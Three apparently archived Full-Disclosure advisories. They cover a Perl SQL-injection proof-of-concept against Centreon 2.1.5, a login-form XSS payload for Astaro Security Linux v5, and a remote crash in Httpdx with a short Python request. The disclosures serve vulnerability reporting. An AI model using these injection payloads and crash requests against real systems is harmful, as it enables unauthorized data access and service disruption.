[Full-disclosure] Vulnerability Centreon IT & Network Monitoring v2.1.5
#!/usr/bin/perl
# //[PoC]-//
#
# Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL
# Version : 2.1.5
# Author : Jonathan Salwan (j.sal...@sysdream.com)
#
#
# [Vuln sql injection]
# http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL
Injection]&o=p&min=1
#
# http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT
1,@@version,3,4,5&o=p&min=1
#
#
# //---[Credit]---//
#
# http://www.sysdream.com/article.php?story_id=328§ion_id=78
# http://www.shell-storm.org
#
use LWP::UserAgent;
my $url = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
my $sql = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION
SELECT 1,@@version,3,4,5&o=p&min=1';
my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');
my $req2 = $ua->post($url,
{useralias => $login, password => $paswd, submit =>
'login'},
Cookie => $cook,
Content-Type => 'application/x-www-form-urlencoded'
);
my $response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();
open(FILE, '>sql-centreon.txt');
print FILE $content;
close(FILE);
print "\n[Answer SQL Injection]\n\n";
my $selection = system('cat sql-centreon.txt | grep
">Host"');
unlink('sql-centreon.txt');
print "\n";
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability Astaro Security Linux v5
Program : Astaro Security Linux v5
PoC : XSS
Homepage : http://www.astaro.com/
Found by : Vincent Hautot
Contact : v.hautot () sysdream com
//- Application description
Astaro Security Linux is a complete network security solution that
protects organizations against a wide range of threats to security
and productivity.
//- Description of vulnerability
This Xss was found on index.fpl page in the login form. Usig this flaw
it is possible to execute Javascript code.
Posting using multipart/form-data does not work ; use this data instead:
username...@fucking.mail&password=DTC&SID=>">alert("XSS !!!")
&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0
//- Credits
http://www.sysdream.com/article.php?story_id=326§ion_id=78
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability Httpdx v1.5.3b
Program : Httpdx v1.5.3b PoC : Remote Crash Service (if http.log=1) Homepage : http://sourceforge.net/projects/httpdx/ Found by : Jonathan Salwan This Advisory: Jonathan Salwan Contact : j.sal...@sysdream.com //- Application description Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file. //- Description of vulnerability The vulnerability is caused due to set http.log=1 in httpdx.conf - Error Writting log This can be exploited to crash all services http & ftp. Use simple GET request for crash service. //- Credits http://www.sysdream.com/article.php?story_id=325§ion_id=78 http://www.shell-storm.org import urllib import urllib2 url = 'http://172.16.240.128/' req = urllib2.Request(url) answer = urllib2.urlopen(req) page = answer.read() ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
